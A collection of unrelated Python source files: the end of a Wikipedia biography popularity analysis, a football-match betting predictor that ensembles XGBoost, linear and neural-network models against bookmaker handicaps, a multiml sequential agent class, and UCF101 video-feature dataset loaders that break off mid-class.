        #ut.plot_rank_size(list([item_frequency_female[:np.max(q99)], item_frequency_male[:np.max(q99)]]), labels, ['pink','blue'], path+'/numedition_gender_ranksize_99.png', 'Rank', 'Num Editions', False, True)
        #print "Mann Withney U Test Frequ Dist:"
        #print stats.mstats.mannwhitneyu(item_frequency_female, item_frequency_male)
        #print stats.ranksums(item_frequency_female, item_frequency_male)
        ut.plot_cdf(list([item_frequency_female, item_frequency_male]), labels, ['pink','blue'], path+'/numedition_gender_ccdf'+self.pre+"-"+self.post+'.png', 'Num Editions', True, False, True)
        #ut.plot_cdf(list([item_frequency_female[:np.max(q95)], item_frequency_male[:np.max(q95)]]), labels, ['pink','blue'], path+'/numedition_gender_ccdf_95.png', 'Num Editions', True, False, True)
        #ut.plot_cdf(list([item_frequency_female[:np.max(q99)], item_frequency_male[:np.max(q99)]]), labels, ['pink','blue'], path+'/numedition_gender_ccdf_99.png', 'Num Editions', True, False, True)
        self.logfile.write("\n\n men median(men mean), women median (women mean)")
        self.logfile.write("\n "+ str(np.median(men.edition_count.values))+'('+str(np.mean(men.edition_count.values))+'), '+ str(np.median(women.edition_count.values))+'('+str(np.mean(women.edition_count.values))+')')
        return {"class":classname, "median-men": np.median(men.edition_count.values), "mean-men":np.mean(men.edition_count.values), "sem-men":stats.sem(men.edition_count.values),
                "sem-women":stats.sem(women.edition_count.values), "median-women":np.median(women.edition_count.values), "mean-women":np.mean(women.edition_count.values)}

    def regression(self):
        """Fit a negative-binomial GLM of edition_count on gender, English
        availability, dbpedia class and birth century; write the summary
        to the logfile."""
        from statsmodels.formula.api import glm
        from statsmodels.api import families
        self.people.rename(columns={'class': 'dbpedia_class'}, inplace=True) # all_bios is the dataframe with the consolidated data. somehow it doesn't work if the class column is named "class"
        people = self.people[(self.people.birth_century >= 0) & (self.people.birth_century <= 2000)]
        m = glm("edition_count ~ C(gender,Treatment(reference='male')) + C(available_english) + C(dbpedia_class,Treatment(reference='http://dbpedia.org/ontology/Person')) + C(birth_century)",
                data=people, family=families.NegativeBinomial()).fit()
        print (m.summary(), file=self.logfile) # <-- this gives you the table of coefficients with p-values, confidence intervals, and so on
if __name__ == "__main__":
    # analyze all data without restricting start and end by birth year
    # (-1, -1 presumably means "no birth-year filter" — TODO confirm against
    # GlobalWikipediaPopularity.__init__)
    pop = GlobalWikipediaPopularity('data/consolidated_person_data.csv', -1, -1)
    # pop.analyze_numlangedition_per_profession()
    # pop.analyze_numlangedition_per_decade()
    # select interval in which people should be born
    startyears = [1900]
    endyear = 2015
    for year in startyears:
        # rebuild the analysis restricted to people born in [year, endyear]
        pop = GlobalWikipediaPopularity('data/consolidated_person_data.csv', year, endyear)
        print (pop.people.shape)
        pop.analyze_num_lang_edition("all", pop.people)
        pop.regression()
|
<filename>src/prediction2.py<gh_stars>0
import datetime
import pandas as pd
import xgboost as xgb
from keras.models import load_model
from sklearn.externals import joblib
from fixtures import get_fixtures, get_fixtures_other
from fixtures_sportmonks import get_fixtures_sportsmonks, get_fixtures_other_sportsmonks
# NOTE(review): absolute, machine-specific path — this script only runs on the
# author's machine as-is; consider deriving it from __file__.
PATH = "C:\\Users\\Konny\\DataScience\\SpicedAcademy\\fussball_vorhersagen\\src\\"
# Timestamp used to tag saved prediction files, e.g. "17-05-21".
DATE = datetime.datetime.now().strftime("%d-%m-%y")
# Feature columns fed to the models. The last 8 entries ("D1".."SP1") are
# league indicator columns that exist only for the major leagues; the
# minor-league models use COLS[:-8].
COLS = ['H_avgGD', 'A_avgGD', 'H_avgG', 'A_avgG', 'H_avgG_c', 'A_avgG_c', 'H_avgST', 'A_avgST', 'H_avgST_c', 'A_avgST_c', 'H_avgC', 'A_avgC', 'H_avgC_c', 'A_avgC_c', 'H_GoalDiff_last', 'A_GoalDiff_last', 'H_xG_PoiMas', 'A_xG_PoiMas', 'H_Form_Tot4', 'A_Form_Tot4','H_Def_Rat', 'H_Off_Rat', 'A_Def_Rat', 'A_Off_Rat', "H_prob_odds", "D_prob_odds", "A_prob_odds", "D1", "E0", "E1", "E2", "E3", "F1", "I1", "SP1"]
def approx_goaldiff(line, ahc_home_odds):
    """Approximate the goal difference implied by the bookmaker's Asian
    handicap line and the odds on the home side.

    line:           the Asian handicap line (e.g. -0.5).
    ahc_home_odds:  decimal odds on the home team at that line.

    Returns the approximated goal difference, rounded to 2 decimals.
    """
    # 1.93 is treated as the "fair" odds level; 1.25 scales the odds
    # deviation into goals.
    odds_offset = ahc_home_odds - 1.93
    return round(line + odds_offset / 1.25, 2)
def get_models(df, X, prefix=""):
    """
    Loads and runs the different models and returns their predictions

    df:     fixtures dataframe; prediction columns are added to it and the
            augmented frame is returned.
    X:      feature matrix (df[COLS], or df[COLS[:-8]] for minor leagues).
    prefix: weight-file name prefix: "" for major leagues, "other_" for minor.
    """
    ### XGB
    # NOTE(review): sklearn.externals.joblib was removed in scikit-learn 0.23;
    # newer environments need a plain `import joblib` at the top of the file.
    xgb_h = joblib.load(PATH + "model_weights\\{}xgb_h.model".format(prefix))
    xgb_a = joblib.load(PATH + "model_weights\\{}xgb_a.model".format(prefix))
    DMtrain = xgb.DMatrix(data=X)
    xgb_hg = xgb_h.predict(DMtrain)  # predicted home goals
    xgb_ag = xgb_a.predict(DMtrain)  # predicted away goals
    ### Lin Reg
    lin_reg_h = joblib.load(PATH + "model_weights\\{}lin_reg_h.joblib".format(prefix))
    lin_reg_a = joblib.load(PATH + "model_weights\\{}lin_reg_a.joblib".format(prefix))
    lin_hg = lin_reg_h.predict(X)
    lin_ag = lin_reg_a.predict(X)
    ### ANN
    model = load_model(PATH + "model_weights\\{}ann_reg.h5".format(prefix))
    scaler_x = joblib.load(PATH + "model_weights\\{}ann_scaler_x.joblib".format(prefix))
    X_scaled = scaler_x.transform(X)
    ann = model.predict(X_scaled)
    scaler_y = joblib.load(PATH + "model_weights\\{}ann_scaler_y.joblib".format(prefix))
    # undo the target scaling so the ANN output is on the goal scale again
    ann_preds = scaler_y.inverse_transform(ann)
    ann_preds = pd.DataFrame(ann_preds, columns=["ANN_HG", "ANN_AG"])
    ### putting the results together
    df["adj_AHC"] = approx_goaldiff(df.BbAHh, df.BbAvAHH)
    df["XGB_HG"] = xgb_hg
    df["XGB_AG"] = xgb_ag
    # *_HC_Diff: model's goal difference minus the bookmaker-implied one
    df["XGB_HC_Diff"] = df["XGB_AG"] - df["XGB_HG"] - df["adj_AHC"]
    df["LIN_HG"] = lin_hg
    df["LIN_AG"] = lin_ag
    df["LIN_HC_Diff"] = df["LIN_AG"] - df["LIN_HG"] - df["adj_AHC"]
    # NOTE(review): concat on axis=1 aligns on the index — assumes df has a
    # clean RangeIndex matching ann_preds; verify in the fixtures helpers.
    df = pd.concat([df, ann_preds], axis=1)
    df["ANN_HC_Diff"] = df["ANN_AG"] - df["ANN_HG"] - df["adj_AHC"]
    df["Diff"] = round((df["ANN_HC_Diff"] + df["XGB_HC_Diff"] + df["LIN_HC_Diff"]) / 3, 2)
    # ensemble expectations: simple mean of the three models
    df["x_HG"] = (df["XGB_HG"] + df["LIN_HG"] + df["ANN_HG"]) / 3
    df["x_AG"] = (df["XGB_AG"] + df["LIN_AG"] + df["ANN_AG"]) / 3
    df["x_HC"] = df["x_AG"] - df["x_HG"]
    df["AHC"] = df["BbAHh"]
    # NOTE(review): "HC_Diff_Avg" is not a column of df (the averaged column is
    # named "Diff" and is already rounded above); DataFrame.round silently
    # ignores unknown keys, so that entry is a no-op.
    df = df.round({"x_HG": 2, "x_AG": 2, "x_HC": 2, "HC_Diff_Avg":2})
    return df
def get_predictions(save=None):
    """
    Calculates predictions for the new matchday
    save: if save -> saves predictions as pickle file (and an Excel copy)

    Returns (preds, bets): the full prediction table and the subset with a
    recommended bet; both are None when no new fixtures are available.
    """
    new_matches = pd.read_csv("http://www.football-data.co.uk/fixtures.csv")
    # latest kickoff date in the published fixtures file
    fix_date = max(pd.to_datetime(new_matches.Date, format='%d/%m/%y'))
    if datetime.date.today() > fix_date.date():
        # fixtures file is stale — nothing upcoming to predict
        print("No new matches! Come back later!\nData for new matches usually arrives Tuesday for midweek matches and friday for weekend matches.")
        preds = None
        bets = None
    else:
        print("preprocessing major leagues...")
        main_leagues = get_fixtures()
        if main_leagues.empty:
            print("no major leagues this matchday")
        else:
            X_main = main_leagues[COLS]
            df_main = get_models(main_leagues, X_main)
        print("preprocessing minor leagues...")
        other_leagues = get_fixtures_other()
        if other_leagues.empty:
            print("no minor leagues this matchday")
        else:
            # minor leagues have no league indicator columns (last 8 of COLS)
            X_other = other_leagues[COLS[:-8]]
            df_other = get_models(other_leagues, X_other, "other_")
        print("evaluating models...")
        # combine whichever of the two league groups produced predictions
        if not main_leagues.empty and not other_leagues.empty:
            df = pd.concat([df_main, df_other]).reset_index(drop=True)
        elif not main_leagues.empty and other_leagues.empty:
            df = df_main.copy()
        elif not other_leagues.empty and main_leagues.empty:
            df = df_other.copy()
        else:
            print("There are no matches on this week")
            return None, None
        # bet when the ensemble disagrees with the bookmaker by >= 0.15 goals
        df.loc[df["Diff"] <= -0.15, "BET"] = "HOME " + df["AHC"].apply(str)
        df.loc[df["Diff"] >= 0.15, "BET"] = "AWAY " + (-df["AHC"]).apply(str)
        df.loc[abs(df["Diff"]) < 0.15, "BET"] = "------"
        preds = df.loc[:,["Date", "Div", "HomeTeam", "AwayTeam", "x_HG", "x_AG", "x_HC", "AHC", "adj_AHC", "Diff", "BbAvAHH", "BbAvAHA", "BET"]]
        preds = preds.rename({"BbAvAHH": "H_Odds", "BbAvAHA": "A_Odds"}, axis="columns")
        bets = preds.loc[abs(preds["Diff"]) >= 0.15].reset_index(drop=True)
        if save:
            preds.to_pickle(PATH + f"predictions\\pkl\\prediction_{DATE}.pkl")
            preds.to_excel(PATH + f"predictions\\excel\\prediction_{DATE}.xlsx")
    print("Done! Good luck!")
    return preds, bets
def get_predictions_sportmonks(date1, date2, save=None):
    """
    Calculates predictions for the new matchday
    save: if save -> saves predictions as pickle file (and an Excel copy)
    date format: "2018-11-16"

    NOTE(review): near-duplicate of get_predictions() with the sportmonks
    fixture sources and no staleness check — keep the two in sync.
    Returns (preds, bets), or (None, None) when there are no matches.
    """
    print("preprocessing major leagues...")
    main_leagues = get_fixtures_sportsmonks(date1, date2)
    if main_leagues.empty:
        print("no major leagues this matchday")
    else:
        X_main = main_leagues[COLS]
        df_main = get_models(main_leagues, X_main)
    print("preprocessing minor leagues...")
    other_leagues = get_fixtures_other_sportsmonks(date1, date2)
    if other_leagues.empty:
        print("no minor leagues this matchday")
    else:
        # minor leagues have no league indicator columns (last 8 of COLS)
        X_other = other_leagues[COLS[:-8]]
        df_other = get_models(other_leagues, X_other, "other_")
    print("evaluating models...")
    # combine whichever of the two league groups produced predictions
    if not main_leagues.empty and not other_leagues.empty:
        df = pd.concat([df_main, df_other]).reset_index(drop=True)
    elif not main_leagues.empty and other_leagues.empty:
        df = df_main.copy()
    elif not other_leagues.empty and main_leagues.empty:
        df = df_other.copy()
    else:
        print("There are no matches on this week")
        return None, None
    # bet when the ensemble disagrees with the bookmaker by >= 0.15 goals
    df.loc[df["Diff"] <= -0.15, "BET"] = "HOME " + df["AHC"].apply(str)
    df.loc[df["Diff"] >= 0.15, "BET"] = "AWAY " + (-df["AHC"]).apply(str)
    df.loc[abs(df["Diff"]) < 0.15, "BET"] = "------"
    preds = df.loc[:,["Date", "Div", "HomeTeam", "AwayTeam", "x_HG", "x_AG", "x_HC", "AHC", "adj_AHC", "Diff", "BbAvAHH", "BbAvAHA", "BET"]]
    preds = preds.rename({"BbAvAHH": "H_Odds", "BbAvAHA": "A_Odds"}, axis="columns")
    bets = preds.loc[abs(preds["Diff"]) >= 0.15].reset_index(drop=True)
    if save:
        preds.to_pickle(PATH + f"predictions\\pkl\\prediction_{DATE}.pkl")
        preds.to_excel(PATH + f"predictions\\excel\\prediction_{DATE}.xlsx")
    print("Done! Good luck!")
    return preds, bets
|
<gh_stars>1-10
"""SequentialAgent module."""
import copy
from multiml import logger
from multiml.agent.basic import BaseAgent
class SequentialAgent(BaseAgent):
    """Agent executing sequential tasks.

    Examples:
        >>> task0 = your_task0
        >>> task1 = your_task1
        >>> task2 = your_task2
        >>>
        >>> agent = SequentialAgent(storegate=storegate,
        >>>                         task_scheduler=[task0, task1, task2],
        >>>                         metric=your_metric)
        >>> agent.execute()
        >>> agent.finalize()
    """
    def __init__(self,
                 differentiable=None,
                 diff_pretrain=False,
                 diff_task_args=None,
                 num_trials=None,
                 **kwargs):
        """Initialize sequential agent.

        Args:
            differentiable (str): ``keras`` or ``pytorch``. If differentiable is given,
                ``ConnectionTask()`` is created based on sequential tasks. If differentiable is
                None (default), sequential tasks are executed step by step.
            diff_pretrain (bool): If True, each subtask is trained before creating
                ``ConnectionTask()``.
            diff_task_args (dict): arbitrary args passed to ``ConnectionTask()``.
            num_trials (int): number of trials. Average value of trials is used as final metric.
        """
        if diff_task_args is None:
            diff_task_args = {}
        super().__init__(**kwargs)
        self._result = None  # result dict of the latest execute()
        self._differentiable = differentiable
        self._diff_pretrain = diff_pretrain
        self._diff_task_args = diff_task_args
        self._num_trials = num_trials

    @property
    def result(self):
        """Return result of execution."""
        return self._result

    @result.setter
    def result(self, result):
        """Set result of execution."""
        self._result = result

    @logger.logging
    def execute(self):
        """Execute sequential agent."""
        # a sequential agent supports exactly one pipeline: no alternative
        # subtasks and no hyperparameter scan
        if len(self.task_scheduler) != 1:
            raise ValueError('Multiple sutasks or hyperparameters are defined.')
        subtasktuples = self.task_scheduler[0]
        self._result = self.execute_subtasktuples(subtasktuples, 0)

    @logger.logging
    def finalize(self):
        """Finalize sequential agent: print and persist the result."""
        if self._result is None:
            logger.warn(f'No result at finalize of {self.__class__.__name__}')
        else:
            header = f'Result of {self.__class__.__name__}'
            names, data = self._print_result(self._result)
            logger.table(header=header, names=names, data=data, max_length=40)
            # persist the result through the saver backend
            self.saver['result'] = self._result

    def execute_subtasktuples(self, subtasktuples, counter):
        """Execute given subtasktuples.

        Dispatches to step-by-step pipeline execution or to the
        differentiable connection model; when ``num_trials`` is set the
        metric is averaged over that many repetitions.
        """
        if self._differentiable is None:
            fn_execute = self.execute_pipeline
        else:
            fn_execute = self.execute_differentiable
        if self._num_trials is None:
            return fn_execute(subtasktuples, counter)
        else:
            metric_values = []
            for ii in range(self._num_trials):
                result = fn_execute(subtasktuples, counter, ii)
                metric_values.append(result['metric_value'])
            # keep per-trial metrics; report their mean as the final metric
            # (the returned ids/hps are those of the last trial)
            result['metric_values'] = metric_values
            result['metric_value'] = sum(metric_values) / len(metric_values)
            return result

    def execute_pipeline(self, subtasktuples, counter, trial=None):
        """Execute pipeline: run each subtask in order, then compute the metric."""
        result = {'task_ids': [], 'subtask_ids': [], 'subtask_hps': [], 'metric_value': None}
        for subtasktuple in subtasktuples:
            task_id = subtasktuple.task_id
            subtask_id = subtasktuple.subtask_id
            subtask_env = subtasktuple.env
            # deepcopy so later mutation of hps does not leak into the scheduler
            subtask_hps = copy.deepcopy(subtasktuple.hps)
            subtask_env.saver = self._saver
            subtask_env.storegate = self._storegate
            subtask_env.job_id = counter
            subtask_env.trial_id = trial
            subtask_env.set_hps(subtask_hps)
            self._execute_subtask(subtasktuple)
            result['task_ids'].append(task_id)
            result['subtask_ids'].append(subtask_id)
            result['subtask_hps'].append(subtask_hps)
        self._metric.storegate = self._storegate
        result['metric_value'] = self._metric.calculate()
        return result

    def execute_differentiable(self, subtasktuples, counter, trial=None):
        """Execute connection model: optionally pretrain subtasks, then build
        and run a ModelConnectionTask over all of them."""
        result = {'task_ids': [], 'subtask_ids': [], 'subtask_hps': [], 'metric_value': None}
        if self._diff_pretrain:
            # pretrain every subtask individually before connecting them
            for subtasktuple in subtasktuples:
                task_id = subtasktuple.task_id
                subtask_id = subtasktuple.subtask_id
                subtask_env = subtasktuple.env
                subtask_hps = copy.deepcopy(subtasktuple.hps)
                subtask_env.saver = self._saver
                subtask_env.storegate = self._storegate
                subtask_env.job_id = counter
                subtask_env.trial_id = trial
                subtask_env.set_hps(subtask_hps)
                self._execute_subtask(subtasktuple)
                result['task_ids'].append(task_id)
                result['subtask_ids'].append(subtask_id)
                result['subtask_hps'].append(subtask_hps)
        subtasks = [v.env for v in subtasktuples]
        self._diff_task_args['auto_ordering'] = False
        if self._differentiable == 'keras':
            from multiml.task.keras import ModelConnectionTask
            subtask = ModelConnectionTask(
                subtasks=subtasks,
                **self._diff_task_args,
            )
        elif self._differentiable == 'pytorch':
            from multiml.task.pytorch import ModelConnectionTask
            subtask = ModelConnectionTask(
                subtasks=subtasks,
                **self._diff_task_args,
            )
        else:
            raise ValueError(f'differentiable: {self._differentiable} is not supported.')
        from multiml.hyperparameter import Hyperparameters
        from multiml.task_scheduler import subtasktuple
        task_id = 'connection-' + self._differentiable
        subtask_id = subtask.get_unique_id()
        hps = Hyperparameters()  # the connection task itself has no hps
        self._execute_subtask(subtasktuple(task_id, subtask_id, subtask, hps))
        self._metric.storegate = self._storegate
        metric = self._metric.calculate()
        result['task_ids'].append(task_id)
        result['subtask_ids'].append(subtask_id)
        result['subtask_hps'].append(hps)
        result['metric_value'] = metric
        return result

    def _execute_subtask(self, subtask, is_skip=False):
        """Execute subtask: wire storegate/saver, then run and finalize it.

        NOTE(review): ``is_skip`` is currently unused — confirm whether
        callers/subclasses rely on it before removing.
        """
        subtask.env.storegate = self._storegate
        subtask.env.saver = self._saver
        subtask.env.execute()
        subtask.env.finalize()

    def _print_result(self, result):
        """Return (column names, rows) for the summary table of *result*."""
        metric_name = self._metric.name
        names = ['task_id', 'subtask_id', 'hps', f'metric({metric_name})']
        data = []
        for task_id, subtask_id, subtask_hp in zip(result['task_ids'], result['subtask_ids'],
                                                   result['subtask_hps']):
            if subtask_hp is None or len(subtask_hp) == 0:
                data.append([task_id, subtask_id, 'no hyperparameters'])
            else:
                # one row per hyperparameter; repeat ids only on the first row
                for index, (key, value) in enumerate(subtask_hp.items()):
                    if index == 0:
                        data.append([task_id, subtask_id, f'{key} = {value}'])
                    else:
                        data.append(['', '', f'{key} = {value}'])
        # the metric value is shown on the first row only
        metric_data = []
        for index, idata in enumerate(data):
            if index == 0:
                metric_data.append(idata + [f'{result["metric_value"]}'])
            else:
                metric_data.append(idata + [''])
        return names, metric_data
|
<gh_stars>0
import torch
import os.path as osp
import os
from torch.utils.data import Dataset
## This class loads the feature vectors for the videos and the corresponding labels.
import numpy as np
from torch.autograd import Variable
import pdb
import csv
import collections
class UCF101(Dataset):
    """Video-level dataset over precomputed UCF101 features.

    Each video directory under ``<ucf_dir>/<name>_features`` contains
    ``features_flow.npy`` and ``features_rgb.npy``. Items are dicts with
    segment-pooled 'flow' and 'rgb' features, the per-video 'label' vector
    and 'numInputs' (number of feature frames in the video).
    """

    def __init__(self, dataset_name, opts):
        # opts is a project options object; fields used here: ucf_dir,
        # feature_size, labels_dir, num_classes, combine_strategy, segments.
        self._ucf_dir = osp.join(opts.ucf_dir, "{}_features".format(dataset_name))
        self._ignore_names = [".", ".."]
        self._feature_size = opts.feature_size
        self._file_names = []
        self.class_labels(dataset_name, opts.labels_dir)
        self._labels = []
        for file in os.listdir(self._ucf_dir):
            if file not in self._ignore_names:
                self._file_names.append(file)
                video_index = self.video2index[file]
                self._labels.append(self.video_labels[video_index])
        self._labels = np.stack(self._labels)
        self._num_classes = opts.num_classes
        # attribute name kept as-is ("startegy") for external readers
        self._combine_startegy = opts.combine_strategy
        self._segments = opts.segments
        self._labels = torch.from_numpy(self._labels).float()

    def __len__(self):
        return len(self._file_names)

    def __getitem__(self, item):
        """Return pooled flow/rgb features, the label and the frame count."""
        flow_features, rgb_features, numInputs = self.forward_video(item)
        label = self.forward_label(item)
        data = dict()
        data['flow'] = flow_features
        data['rgb'] = rgb_features
        data['label'] = label
        data['numInputs'] = numInputs
        return data

    def class_labels(self, name, labels_dir):
        """Load the class/video index maps and the per-video label matrix."""
        class2index_file = osp.join(labels_dir, 'class_dict.csv')
        video2index_file = osp.join(labels_dir, 'video_indices_{}.csv'.format(name))
        video2labels_file = osp.join(labels_dir, 'class_labels_{}.npy'.format(name))
        self.class2index = dict()
        self.video2index = dict()
        self.video_labels = None
        with open(class2index_file, 'r') as csvfile:
            reader = csv.reader(csvfile)
            for row in reader:
                self.class2index[row[0]] = int(row[1])
        with open(video2index_file, 'r') as csvfile:
            reader = csv.reader(csvfile)
            for row in reader:
                self.video2index[row[0]] = int(row[1])
        self.video_labels = np.load(video2labels_file)

    def forward_label(self, index):
        """Return the label vector for *index* as a CUDA Variable."""
        return Variable(self._labels[index]).cuda()

    def forward_video(self, index):
        """Pool the per-frame features of one video into ``self._segments``
        segments according to the configured combine strategy."""
        filename = self._file_names[index]
        flow_file = osp.join(self._ucf_dir, filename, 'features_flow.npy')
        rgb_file = osp.join(self._ucf_dir, filename, 'features_rgb.npy')
        # BUGFIX: np.load() must receive a path or a *binary* file object;
        # the previous open(file, 'r') text handle fails under Python 3.
        flow_features = np.load(flow_file)
        rgb_features = np.load(rgb_file)
        flow_segments = np.zeros((self._segments, self._feature_size),
                                 dtype=np.float32)
        rgb_segments = np.zeros((self._segments, self._feature_size),
                                dtype=np.float32)
        segment_len = flow_features.shape[0] // self._segments + 1
        total_segments = flow_features.shape[0]
        numInputs = np.expand_dims(np.array([flow_features.shape[0]]), axis=0)
        if self._combine_startegy == 'uniform':
            # evenly spaced windows, wrapping past the end of the video
            for i in range(self._segments):
                start = (i * segment_len)
                end = (i + 1) * segment_len
                seq = np.arange(start, end)
                flow_segments[i, :] = np.mean(
                    np.take(flow_features, seq, axis=0, mode='wrap'), axis=0)
                rgb_segments[i, :] = np.mean(
                    np.take(rgb_features, seq, axis=0, mode='wrap'), axis=0)
        if self._combine_startegy == 'strat1':
            # like 'uniform', but with one random offset shared by all windows
            offset = np.random.choice(segment_len, 1)
            for i in range(self._segments):
                start = (i * segment_len) + offset
                end = (i + 1) * segment_len + offset
                seq = np.arange(start, end)
                flow_segments[i, :] = np.mean(
                    np.take(flow_features, seq, axis=0, mode='wrap'), axis=0)
                rgb_segments[i, :] = np.mean(
                    np.take(rgb_features, seq, axis=0, mode='wrap'), axis=0)
        if self._combine_startegy == 'strat2':
            # average a random 80% subsample (with replacement) of each window
            for i in range(self._segments):
                start = (i * segment_len)
                end = (i + 1) * segment_len
                if segment_len > 1:
                    seq = np.random.choice(segment_len, int(segment_len * 0.8)) + start
                else:
                    seq = np.arange(start, end)
                flow_segments[i, :] = np.mean(
                    np.take(flow_features, seq, axis=0, mode='wrap'), axis=0)
                rgb_segments[i, :] = np.mean(
                    np.take(rgb_features, seq, axis=0, mode='wrap'), axis=0)
        if self._combine_startegy == 'strat3':
            # pick one random frame per (wrapped) segment instead of averaging
            for i in range(self._segments):
                sample_range = total_segments
                while sample_range < self._segments + 1:
                    sample_range = sample_range + total_segments
                sampledN = np.round(
                    np.linspace(0, sample_range, self._segments + 1)).astype(np.int32)
                differences = sampledN[1:] - sampledN[0:-1]
                randoms = np.random.rand(self._segments)
                # BUGFIX: np.int was removed in NumPy 1.24; the alias meant the
                # builtin int, which is used here instead.
                K = sampledN[0:-1] + np.round(randoms * differences).astype(int)
                K = np.mod(K, np.ones(K.shape) * total_segments).astype(int)
                flow_segments = flow_features[K, :]
                rgb_segments = rgb_features[K, :]
        # rgb/flow features have one row per frame; each pooled segment is a
        # feature_size-dimensional vector
        flow_segments = Variable(torch.from_numpy(flow_segments).cuda())
        rgb_segments = Variable(torch.from_numpy(rgb_segments).cuda())
        numInputs = Variable(torch.from_numpy(numInputs))
        return flow_segments, rgb_segments, numInputs
class UCF101Temporal(Dataset):
    """Dataset returning one mean-pooled feature vector per annotated
    temporal segment of a UCF101 video, with per-segment class labels.

    Segment boundaries and labels come from ``time_stamps.txt`` — lines of
    the form ``video;start,end,label;start,end,label;...``.
    """

    def __init__(self, dataset_name, opts):
        # NOTE: the redundant `self._ucf_dir = opts.ucf_dir` assignment that
        # was immediately overwritten has been removed.
        self._ucf_dir = osp.join(opts.ucf_dir, "{}_features".format(dataset_name))
        self._ignore_names = [".", ".."]
        self._feature_size = opts.feature_size
        self._file_names = []
        self.class_labels(dataset_name, opts.labels_dir)
        self._labels = []
        self._video2segment_label = dict()
        for file in os.listdir(self._ucf_dir):
            if not (file in self._ignore_names):
                self._file_names.append(file)
                video_index = self.video2index[file]
                self._labels.append(self.video_labels[video_index])
        with open(os.path.join(opts.labels_dir, 'time_stamps.txt')) as f:
            for line in f:
                splits = line.strip().split(';')
                s = []
                for p in splits[1:]:
                    # (start_frame, end_frame, class_label)
                    s.append((int(float(p.split(',')[0])), int(float(p.split(',')[1])),
                              int(p.split(',')[2])))
                self._video2segment_label[splits[0]] = s
        self._segment_positions_and_labels = []  # per video: [(start, end, label), ...]
        for f in self._file_names:
            self._segment_positions_and_labels.append(self._video2segment_label[f])
        self._labels = np.stack(self._labels)
        self._num_classes = opts.num_classes
        self._combine_startegy = opts.combine_strategy
        self._segments = opts.segments
        self._labels = torch.from_numpy(self._labels).float()

    def __len__(self):
        return len(self._file_names)

    def __getitem__(self, item):
        """Return per-segment flow/rgb features and labels for one video."""
        flow_features, rgb_features, labels, filename = self.forward_video_as_segments(
            item)
        data = dict()
        data['flow'] = flow_features
        data['rgb'] = rgb_features
        data['label'] = labels
        return data

    def forward_video_as_segments(self, index):
        """Mean-pool the features inside each annotated segment of the video."""
        filename = self._file_names[index]
        flow_file = osp.join(self._ucf_dir, filename, 'features_flow.npy')
        rgb_file = osp.join(self._ucf_dir, filename, 'features_rgb.npy')
        # BUGFIX: np.load() must receive a path or a *binary* file object;
        # the previous open(file, 'r') text handle fails under Python 3.
        flow_features = np.load(flow_file)
        rgb_features = np.load(rgb_file)
        flow_segments = []
        rgb_segments = []
        labels = []
        segments = self._segment_positions_and_labels[index]
        for s in segments:
            # skip annotations that start beyond the extracted features
            if s[0] < rgb_features.shape[0]:
                flow_segments.append(torch.from_numpy(
                    np.mean(flow_features[s[0]:max(s[1], s[1] + 1), :], axis=0)))
                rgb_segments.append(
                    torch.from_numpy(
                        np.mean(rgb_features[s[0]:max(s[1], s[1] + 1), :], axis=0)))
                labels.append(torch.Tensor([s[2]]))
        return (flow_segments, rgb_segments, labels, filename)

    def class_labels(self, name, labels_dir):
        """Load the class/video index maps and the per-video label matrix."""
        class2index_file = osp.join(labels_dir, 'class_dict.csv')
        video2index_file = osp.join(labels_dir, 'video_indices_{}.csv'.format(name))
        video2labels_file = osp.join(labels_dir, 'class_labels_{}.npy'.format(name))
        self.class2index = dict()
        self.video2index = dict()
        self.video_labels = None
        with open(class2index_file, 'r') as csvfile:
            reader = csv.reader(csvfile)
            for row in reader:
                self.class2index[row[0]] = int(row[1])
        with open(video2index_file, 'r') as csvfile:
            reader = csv.reader(csvfile)
            for row in reader:
                self.video2index[row[0]] = int(row[1])
        self.video_labels = np.load(video2labels_file)

    def forward_label(self, index):
        """Return the label vector for *index* as a CUDA Variable."""
        return Variable(self._labels[index]).cuda()
# opts should additionally have the following attributes:
# 1. number of frames of the same class, e.g. 800
# 2. number of frames of a different class, e.g. 800
#    (both need to be sufficiently large because we want a sufficient number of frames to actually contain the activity)
# 3. Penalize negative examples being classified as positive more? To separate the non-representative frames further.
# Assuming that classification and 0/1 binary weight prediction are trained iteratively.
class UCF101_modular(Dataset):
    """Per-class binary sampler over precomputed UCF101 features.

    Each item draws one class, samples frame-level features from videos of
    that class (positives) and from other videos (negatives), and returns
    shuffled features with binary labels and per-example loss weights.
    All video features are preloaded into memory at construction time.
    """

    def __init__(self, dataset_name, opts):
        self._ucf_dir = osp.join(opts.ucf_dir, "{}_features".format(dataset_name))
        self._ignore_names = [".", ".."]
        self._feature_size = opts.feature_size
        self._file_names = []
        self.class_labels(dataset_name, opts.labels_dir)
        self._labels = []
        for file in os.listdir(self._ucf_dir):
            if file not in self._ignore_names:
                self._file_names.append(file)
                video_index = self.video2index[file]
                self._labels.append(self.video_labels[video_index])
        self._labels = np.stack(self._labels)
        self._num_classes = opts.num_classes
        self._combine_startegy = opts.combine_strategy
        self._segments = opts.segments
        self._labels = torch.from_numpy(self._labels).float()
        # parameters for the independent classifier training data
        self.weight_pos = opts.weight_pos
        self.weight_neg = opts.weight_neg
        self._num_same = opts.num_same
        self._num_diff = opts.num_diff
        self._num_class_iter_per_epoch = opts.num_class_iter_per_epoch
        self.label_index_dict = self.create_label_index_dict()
        self.flow_features_all, self.rgb_features_all = self.read_all_features()

    def __len__(self):
        # 1 epoch is when the network sees a class approximately
        # num_class_iter_per_epoch times
        return self._num_class_iter_per_epoch * self._num_classes

    def __getitem__(self, item):
        """Return one binary training batch for a randomly drawn class."""
        pos_class, labels, weights, flow_features, rgb_features = self.forward_video(
            item)
        data = dict()
        data['weights'] = weights
        data['labels'] = labels
        data['flow_features'] = flow_features
        data['rgb_features'] = rgb_features
        data['pos_class'] = pos_class
        return data

    def class_labels(self, name, labels_dir):
        """Load the class/video index maps and the per-video label matrix."""
        class2index_file = osp.join(labels_dir, 'class_dict.csv')
        video2index_file = osp.join(labels_dir, 'video_indices_{}.csv'.format(name))
        video2labels_file = osp.join(labels_dir, 'class_labels_{}.npy'.format(name))
        self.class2index = dict()
        self.video2index = dict()
        self.video_labels = None
        with open(class2index_file, 'r') as csvfile:
            reader = csv.reader(csvfile)
            for row in reader:
                self.class2index[row[0]] = int(row[1])
        with open(video2index_file, 'r') as csvfile:
            reader = csv.reader(csvfile)
            for row in reader:
                self.video2index[row[0]] = int(row[1])
        self.video_labels = np.load(video2labels_file)

    def forward_label(self, index):
        """Return the label vector for *index* as a CUDA Variable."""
        return Variable(self._labels[index]).cuda()

    def create_label_index_dict(self):
